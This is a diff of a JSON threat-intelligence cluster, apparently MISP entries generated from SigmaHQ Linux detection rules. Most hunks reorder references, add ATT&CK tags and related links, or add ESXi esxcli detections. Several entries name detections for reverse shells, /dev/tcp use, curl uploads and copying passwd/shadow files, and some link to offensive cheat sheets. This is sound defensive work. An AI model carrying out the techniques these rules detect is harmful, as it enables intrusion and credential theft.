"https://mn3m.info/posts/suid-vs-capabilities/", + "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml" ], "tags": [ @@ -90316,8 +92866,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html", "https://blog.aquasec.com/container-security-tnt-container-attack", + "https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_modify_system_firewall.yml" ], "tags": [ @@ -90750,8 +93300,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", + "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml" ], "tags": [ @@ -90992,10 +93542,10 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ + "https://man7.org/linux/man-pages/man1/passwd.1.html", "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md", "https://linux.die.net/man/1/chage", - "https://man7.org/linux/man-pages/man1/passwd.1.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml" ], "tags": [ @@ -91096,9 +93646,9 @@ "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md", - "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", - "https://linux.die.net/man/8/pam_tty_audit", "https://access.redhat.com/articles/4409591#audit-record-types-2", + "https://linux.die.net/man/8/pam_tty_audit", + "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml" ], "tags": [ @@ -91205,9 +93755,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07", - "https://access.redhat.com/articles/4409591#audit-record-types-2", "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files", + "https://access.redhat.com/articles/4409591#audit-record-types-2", + "https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_create_account.yml" ], "tags": [ @@ -91240,8 +93790,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan", + "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/", "https://book.hacktricks.xyz/shells/shells/linux", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml" ], @@ -91399,8 +93949,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://redcanary.com/blog/ebpf-malware/", "https://man7.org/linux/man-pages/man7/bpf-helpers.7.html", + "https://redcanary.com/blog/ebpf-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_potential_susp_ebpf_activity.yml" ], "tags": [ @@ -91545,9 +94095,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://digital.nhs.uk/cyber-alerts/2018/cc-2825", "https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid", "https://linux.die.net/man/8/useradd", + "https://digital.nhs.uk/cyber-alerts/2018/cc-2825", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_privileged_user_creation.yml" ], "tags": [ @@ -91712,9 +94262,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", - "http://pastebin.com/FtygZ1cg", "https://web.archive.org/web/20170319121015/http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html", + "http://pastebin.com/FtygZ1cg", + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", "https://artkond.com/2017/03/23/pivoting-guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml" ], @@ -91748,8 +94298,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md", + "https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_clear_cmd_history.yml" ], "tags": [ @@ -91980,8 +94530,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c", + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml" ], "tags": [ @@ -92159,8 +94709,8 @@ "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", - "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", + "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml" ], "tags": [ @@ -92196,8 +94746,8 @@ "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", - "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", + "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml" ], "tags": [ @@ -92310,8 +94860,8 @@ "logsource.category": "file_event", "logsource.product": "linux", "refs": [ - "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/", "https://www.makeuseof.com/how-to-install-and-use-doas/", + "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_doas_conf_creation.yml" ], "tags": [ @@ -92415,8 +94965,20 @@ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml" ], - "tags": "No established tags" + "tags": [ + "attack.execution", + "attack.t1059.004" + ] }, + "related": [ + { + "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871", "value": "Linux Reverse Shell Indicator" }, @@ -92436,8 +94998,20 @@ "https://www.poolwatch.io/coin/monero", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml" ], - "tags": "No established tags" + "tags": [ + "attack.impact", + "attack.t1496" + ] }, + "related": [ + { + "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a46c93b7-55ed-4d27-a41b-c259456c4746", "value": "Linux Crypto Mining Pool Connections" }, @@ -92533,8 +95107,8 @@ "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", - "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", + "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup_susp_execution.yml" ], "tags": [ @@ -92684,8 +95258,8 @@ "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", - "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", + "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml" ], "tags": [ @@ -92711,8 +95285,29 @@ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml" ], - "tags": "No established tags" + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1059.004", + "attack.t1036" + ] }, + "related": [ + { + "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ea3ecad2-db86-4a89-ad0b-132a10d2db55", "value": "Interactive Bash Suspicious Children" }, @@ -92764,8 +95359,8 @@ "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", - "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", + "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml" ], "tags": [ @@ -92864,10 +95459,10 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://linuxhint.com/uninstall-debian-packages/", "https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command", "https://sysdig.com/blog/mitre-defense-evasion-falco", "https://linuxhint.com/uninstall_yum_package/", + "https://linuxhint.com/uninstall-debian-packages/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remove_package.yml" ], "tags": [ @@ -92975,8 +95570,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", "https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml" ], "tags": [ @@ -93042,8 +95637,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://blogs.blackberry.com/", "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", + "https://blogs.blackberry.com/", "https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml" ], @@ -93178,11 +95773,11 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://twitter.com/d1r4c/status/1279042657508081664", - "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", "https://curl.se/docs/manpage.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", + "https://twitter.com/d1r4c/status/1279042657508081664", "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", + "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml" ], "tags": [ @@ -93247,8 +95842,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://gtfobins.github.io/gtfobins/apt-get/", "https://gtfobins.github.io/gtfobins/apt/", + "https://gtfobins.github.io/gtfobins/apt-get/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml" ], "tags": [ @@ -93282,9 +95877,9 @@ "logsource.product": "linux", "refs": [ "https://linuxize.com/post/how-to-delete-group-in-linux/", + "https://www.cyberciti.biz/faq/linux-remove-user-command/", "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", "https://linux.die.net/man/8/userdel", - "https://www.cyberciti.biz/faq/linux-remove-user-command/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_userdel.yml" ], "tags": [ @@ -93353,8 +95948,20 @@ "https://www.poolwatch.io/coin/monero", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml" ], - "tags": "No established tags" + "tags": [ + "attack.impact", + "attack.t1496" + ] }, + "related": [ + { + "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9069ea3c-b213-4c52-be13-86506a227ab1", "value": "Linux Crypto Mining Indicators" }, @@ -93371,8 +95978,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html", "https://www.cyberciti.biz/faq/how-force-kill-process-linux/", + "https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_kill_process.yml" ], "tags": [ @@ -93550,6 +96157,32 @@ "uuid": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79", "value": "System Network Connections Discovery - Linux" }, + { + "description": "Detects execution of the \"esxcli\" command with the \"vm\" and \"kill\" flag in order to kill/shutdown a specific VM.", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon", + "creation_date": "2023/09/04", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_esxcli_vm_kill.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html", + "https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/", + "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", + "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "2992ac4d-31e9-4325-99f2-b18a73221bb2", + "value": "ESXi VM Kill Via ESXCLI" + }, { "description": "Detects execution of shells from a parent process located in a temporary (/tmp) directory", "meta": { @@ -93565,8 +96198,8 @@ "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", - "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", + "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml" ], "tags": [ @@ -93589,8 +96222,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://blogs.blackberry.com/", "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", + "https://blogs.blackberry.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml" ], "tags": [ @@ -93817,8 +96450,8 @@ "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", - "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", + "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml" ], "tags": [ @@ -93851,8 +96484,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", "https://bpftrace.org/", + "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml" ], "tags": [ @@ -94029,9 +96662,9 @@ "logsource.product": "linux", "refs": [ "https://linuxize.com/post/how-to-delete-group-in-linux/", - "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", - "https://www.cyberciti.biz/faq/linux-remove-user-command/", "https://linux.die.net/man/8/groupdel", + "https://www.cyberciti.biz/faq/linux-remove-user-command/", + "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_groupdel.yml" ], "tags": [ @@ -94098,9 +96731,9 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/carlospolop/PEASS-ng", "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes", "https://github.com/diego-treitos/linux-smart-enumeration", + "https://github.com/carlospolop/PEASS-ng", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml" ], "tags": [ @@ -94187,6 +96820,48 @@ "uuid": "ea34fb97-e2c4-4afb-810f-785e4459b194", "value": "Curl Usage on Linux" }, + { + "description": "Detects execution of the \"esxcli\" command with the \"system\" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.", + "meta": { + "author": "Cedric Maurugeon", + "creation_date": "2023/09/04", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_esxcli_system_discovery.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html", + "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "attack.t1007" + ] + }, + "related": [ + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "e80273e1-9faf-40bc-bd85-dbaff104c4e9", + "value": "ESXi System Information Discovery Via ESXCLI" + }, { "description": "Detects usage of the \"touch\" process in service file.", "meta": { @@ -94200,8 +96875,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://blogs.blackberry.com/", "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", + "https://blogs.blackberry.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_touch_susp.yml" ], "tags": [ @@ -94254,6 +96929,48 @@ "uuid": "3e102cd9-a70d-4a7a-9508-403963092f31", "value": "Linux Network Service Scanning" }, + { + "description": "Detects changes to the ESXi syslog configuration via \"esxcli\"", + "meta": { + "author": "Cedric Maurugeon", + "creation_date": "2023/09/04", + "falsepositive": [ + "Legitimate administrative activities" + ], + "filename": "proc_creation_lnx_esxcli_syslog_config_change.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://support.solarwinds.com/SuccessCenter/s/article/Configure-ESXi-Syslog-to-LEM?language=en_US", + "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1562.003" + ] + }, + "related": [ + { + "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "8f504411-cb96-4dac-a537-8d2bb7679c59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "38eb1dbb-011f-40b1-a126-cf03a0210563", + "value": "ESXi Syslog Configuration Change Via ESXCLI" + }, { "description": "Detects execution of the bash shell with the interactive flag \"-i\".", "meta": { @@ -94292,8 +97009,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://blogs.blackberry.com/", "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", + "https://blogs.blackberry.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml" ], "tags": [ @@ -94336,6 +97053,50 @@ "uuid": "de25eeb8-3655-4643-ac3a-b662d3f26b6b", "value": "Disable Or Stop Services" }, + { + "description": "Detects execution of the \"esxcli\" command with the \"vm\" flag in order to retrieve information about the installed VMs.", + "meta": { + "author": "Cedric Maurugeon", + "creation_date": "2023/09/04", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_esxcli_vm_discovery.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html", + "https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/", + "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", + "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "attack.t1007" + ] + }, + "related": [ + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "5f1573a7-363b-4114-9208-ad7a61de46eb", + "value": "ESXi VM List Discovery Via ESXCLI" + }, { "description": "Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks", "meta": { @@ -94369,6 +97130,91 @@ "uuid": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", "value": "Commands to Clear or Remove the Syslog" }, + { + "description": "Detects execution of the \"esxcli\" command with the \"storage\" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon", + "creation_date": "2023/09/04", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_esxcli_storage_discovery.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html", + "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_storage.html", + "https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "attack.t1007" + ] + }, + "related": [ + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "f41dada5-3f56-4232-8503-3fb7f9cf2d60", + "value": "ESXi Storage Information Discovery Via ESXCLI" + }, + { + "description": "Detects execution of the \"esxcli\" command with the \"network\" flag in order to retrieve information about the network configuration.", + "meta": { + "author": "Cedric Maurugeon", + "creation_date": "2023/09/04", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_esxcli_network_discovery.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", + "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_network.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "attack.t1007" + ] + }, + "related": [ + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "33e814e0-1f00-4e43-9c34-31fb7ae2b174", + "value": "ESXi Network Configuration Discovery Via ESXCLI" + }, { "description": "Detects java process spawning suspicious children", "meta": { @@ -94402,6 +97248,41 @@ "uuid": "d292e0af-9a18-420c-9525-ec0ac3936892", "value": "Suspicious Java Children Processes" }, + { + "description": "Detects listing of the inodes of the \"/\" directory to determin if the we are running inside of a container.", + "meta": { + "author": "Seth Hanford", + "creation_date": "2023/08/23", + "falsepositive": [ + "Legitimate system administrator usage of these commands", + "Some container tools or 